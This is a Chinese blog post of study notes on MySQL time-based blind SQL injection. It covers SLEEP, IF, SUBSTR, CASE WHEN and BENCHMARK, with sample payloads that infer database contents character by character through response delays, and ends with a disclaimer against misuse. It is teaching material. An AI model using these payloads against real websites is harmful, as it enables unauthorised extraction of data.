自己整理MySQL盲注

最新推荐文章于 2024-06-19 13:35:01 发布
最新推荐文章于 2024-06-19 13:35:01 发布
阅读量930 收藏 3
点赞数 2
文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_25645753/article/details/108052694
版权

一、基于时间延时的盲注:SLEEP

函数 SLEEP( 数字)

函数使用说明:延迟函数,为真时会延时执行代码,为假则不会执行延时。(数字为整数,例:1就是延迟一秒执行。)
例如:

Select * from 表名 where id=1 and sleep(2)

有这个id=1的内容延迟2秒执行,没有则相反。

二、配合if条件触发

IF(expr1, expr2, expr3)

如果IF(1>2, 真, 假)是true,那它的返回值就是真,如果执行条件是false,执行的条件就是假,具体情况视其所在语句而定。
例如:

Select *from table where id=1 and if(database()=' ',sleep(4), null);
Select *from user where username='a' and if(username='admin',sleep(2), null);

(1)判断数据库是否为空
(2)判断数据库用户名是否为admin。

三、再用上截取函数

substring()和substr()

SUBSTRING(str,pos)、SUBSTRING(str FROM pos)、SUBSTRING(str,pos,len)、SUBSTRING(str FROM pos FOR len)

substr(string,start,length)

参数描述同mid()函数,第一个参数为要处理的字符串,start为开始位置,length为截取的长度。

substring_index()

substring_index(str,delim,count)

说明: substring_ index(被截取字段,关键字,关键字出现的次数)

例如:

Select *from user where username='a' or if(substr((select username from user where id=1),1,1)='a',sleep(2),0);

四、再配合select case when条件触发

SQL CASE表达式是一种通用的条件表达式,类似于其它语言中的if/else语句。

 CASE WHEN condition THEN result

    [WHEN...]

    [ELSE result]

    END

例如:

select case when username="admin THEN 'admin' ELSE 'xxx' end from user;
select case when username="admin THEN 'aaa' ELSE (sleep(3)) end from user;

五、基于时间延时的盲注:逐字注入

能够截取字符串,同时能触发延时即可!

Select *from table Where id =1 and (if(substr(database(),1,1)='u', sleep(3), null));
Select * from table where id= 1 and (if(ascii(substr(database(),1,1))=100, sleep(3), null));

六、基于时间延时的盲注:BENCHMARK

除了sleep之外的时间延时注入,还有:BENCHMARK(count,expr)

BENCHMARK()函数重复 count次执行表达式expr。它可以被用于计算 MYSQL处理表达式的速度。结果值通常为0。

select benchmark(100000000,sha(1));
Select * from table where id= 1 and (if(ascii(substr(database(),1,1))=100,benchmark(100000000,sha(1)), null));

声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。

蜜罐小明哥
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql substring_让你的SQL盲注快起来
weixin_39607935的博客
11-26 129
SQL 注入是当前 Web 安全中最常见的安全问题之一,其危害性也比较大,众多白帽子在渗透测试过程中往往会首先着重进行 SQL 注入的测试。盲注SQL 注入的重要的技术之一,在现实中的 SQL 注入案例中,往往很难将注入的结果直接回显出来。因此,盲注也就成为了 SQL 注入必不可少的手段之一。本文想分享一个如何大大提升盲注效率的技巧。与或运算与或运算,操作符分别为&以及...
禁用substr、substring、mid函数的sql注入脚本
weixin_30794851的博客
04-02 267
#encodeing=utf-8 import requests import sys reload(sys) sys.setdefaultencoding('utf-8') payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.') headers = {...
sql注入盲注
最新发布
weixin_64815500的博客
06-19 960
sql注入关于无回显用到的盲注sqli-labs靶场为例子讲解常用盲注类型以及函数。面试或者打ctf可用作参考
Sql注入截取字符串常用函数
灰蜗牛
08-31 488
Sql注入截取字符串常用函数: 转载自:http://www.cnblogs.com/lcamry/p/5504374.html在sql注入中,往往会用到截取字符串的问题,例如不回显的情况下进行的注入,也成为盲注,这种情况下往往需要一个一个字符的去猜解,过程中需要用到截取字符串。本文中主要列举三个函数和该函数注入过程中的一些用例。Ps;此处用mysql进行说明,其他类型数据库请自行检测。 三大法
Day2 SQL注入盲注
Luminous_song的博客
09-03 171
盲注 使用场景 页面无法显示数据库的记录, 只有正常页面和异常页面(即无回显点) 我们只能一点一点去猜 分类 布尔盲注 返回true和false 时间盲注 sleep()根据睡眠时间判断 注入语句 select length(database()): 计算长度 substr(str,pos,num) :截取指定位置指定长度的字符串 ascii(substr(database(),1,1) =107: 查询ascii码中对应的值 if 判断语句 猜数据库长度(第一个语句成立的话,执行第二个语句,否则执行第三
自己整理mysql面试问答题
10-13
自己整理mysql面试问答题,有需要的可以看看
Web应用安全:Mysql盲注.pptx
06-19
Web应用安全领域中,MySQL盲注是一种常见的安全漏洞,它发生在SQL注入攻击中,但攻击者无法直接看到数据库的响应结果。在这种情况下,攻击者必须通过观察页面加载时间、页面内容的变化或者其他间接方式来判断SQL查询...
mysql-blind(高级盲注+基于布尔).docx
01-23
MySQL 高级盲注:布尔型盲注详解】 MySQL盲注,特别是布尔型盲注,是一种在目标页面无明显回显时检测SQL注入漏洞的技术。这种技术源于某些网站的错误处理机制使得常规的UNION查询无法直接揭示数据字段。盲注...
Web应用安全:Mysql盲注文本.docx
06-17
MySQL盲注】是Web应用安全领域中一种重要的SQL注入技术。当攻击者无法直接从网页上获取数据库的反馈信息时,他们会通过一系列的探测和判断来获取敏感数据。盲注主要分为三种类型:基于布尔的SQL盲注、基于时间的...
Linux时间类型、函数和休眠函数
热门推荐
luotuo44的专栏
09-18 1万+
本文主要涉及Linux时间类型、时间函数以及Linux提供的睡眠函数。   时间类型和对应的函数: time_t:       最不陌生的时间类型恐怕是time_t这个类型了吧。它出现在C语言的标准库。但ISO C中并没有规定time_t是什么类型、范围以及精度,不过在POSIX中一般是被实现为有符号的整型。        time_t的单位是秒。函数time()的返回值就是一个time
Linux编程之select
Answer的博客
09-09 1226
select系统调用的的用途是:在一段指定的时间内,监听用户感兴趣的文件描述符上可读、可写和异常等事件 为什么会出现select模型 先看一下下面的这句代码: int iResult = recv(s, buffer,1024); 这是用来接收数据的,在默认的阻塞模式下的套接字里,recv会阻塞在那里,直到套接字连接上有数据可读,把数据读到buffer里后recv函数才会返回,不然就会一直阻塞在那里。在单线程的程序里出现这种情况会导致主线程(单线程程序里只有一个默认的主线程)被阻塞,这样整个程
select 休眠比sleep 更准
01-26 3542
‍int mySleep(int second, int microsecond){timeval t_timeval;t_timeval.tv_sec = second;t_timeval.tv_usec = microsecond;select(0, NULL, NULL, NULL, &t_timeval);return 0;}//kfs中的有段代码是这样写的fd_set rfds;struct timeval timeout;  timeout.tv_sec = 5;  timeout.tv_use
sleep函数_C++系统之select和sleep
weixin_39616287的博客
11-28 396
最近修复内核代码,遇到一些问题,就写了点东西。我在一个进程,有三个线程,其中有两个线程需要延时自己。请问可以在这两个线程中均调用sleep函数实现延时功能吗?其中一个线程在调用sleep的时候会被另一个线程抢占吗?如果抢占了,那么计时器会不会产生冲突?另外采用select(0,NULL,NULL,NULL,&tm);实现延时的时候,可以多次这样子调用并且和sleep函数一起使用吗?sele...
在循环中使用Select 函数,进行等待超时的使用注意点
w468917145的专栏
09-24 5390
目的:设定一个时间值,如果超出这个时间值,例如60秒,Select函数退出 使用select函数的部分代码如下:     //设置超时时间     timeval   *ptimeval   =   new   timeval;     ptimeval.tv_sec   =   60;     ptimeval.tv_usec   =   10;         m_Exit   =   F
定时器的使用和原理浅析,alarm/sleep函数
木牛的博客
06-28 1033
alarm函数(进程不阻塞):使用alarm函数和signal函数,要注册信号处理回调函数,就是说进程并没有被睡眠,处理动作是以信号的形式注册到内核中,当时间到时,以信号的方式打断进程,进入信号处理程序。sleep函数(进程阻塞):sleep函数和usleep函数是将进程阻塞掉,等待硬件定时器时间到达,时间到达后内核再将进程放入就绪队列,从而将进程唤醒。select函数(进程阻塞):select函数属于终端控制篇,或许也可以归类为接口处理篇。select函数可精确到微妙,且准确。为什么sleect会比usl
select实现的睡眠函数
huabiaochen的博客
09-13 3622
/*精确度为0.001秒的sleep函数*/ void m_sleep(unsigned int secs) {   struct timeval time;   time.tv_sec=secs/1000;   time.tv_usec=(secs*1000)%1000000;   select(0,NULL,NULL,NULL,&time); }   //例如:调用s
mysql延时注入_Sql注入的几种有趣操作
weixin_40006763的博客
12-23 423
前言sql注入无论是在CTF比赛还是s实战中都有着非同寻常的重要程度。在CTF比赛中难免会遇到一些有(keng)趣(die)的注入题,他们往往有着令人头疼的过滤规则,这时候就需要我们一步步绕过。 这种注入一般都属于盲注,然而在盲注过程中由于这些过滤规则不太好绕过,这时候就会无从下手。下面分享一下自己在做题中总结的几种比较通用的盲注手法和一些小tips,希望能在今后大家的比赛或者实战中带来...
SQL注入之时间延迟型注入
DM766924的博客
09-16 1518
时间延迟型注入 原理:利用if函数,执行判断; 如果正确,直接返回(时间很短,网速有一定影响) 如果不正确,执行时间延迟,常用的函数有sleep和benchmark 以上操作也可以反过来。适用环境:界面无法用布尔真假判断,也无法报错注入的情况下。 时间延迟注入常用SQL函数介绍 if(condition,expr1,expr2)功能:如果condition是true,则if()的返回值是expr1,否则返回值则为expr2,if()的返回值为数字值或字符串,具体情况视其所在语境而定举例:select
MySQL布尔型高级盲注实战与技巧解析
MySQL盲注是一种高级的Web应用程序安全漏洞,特别是针对那些错误处理机制良好的目标页面。在这种情况下,常规的SQL注入利用方法,如通过UNION查询获取数据字段,可能因为页面无明显回显而变得困难。盲注分为几种类型...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值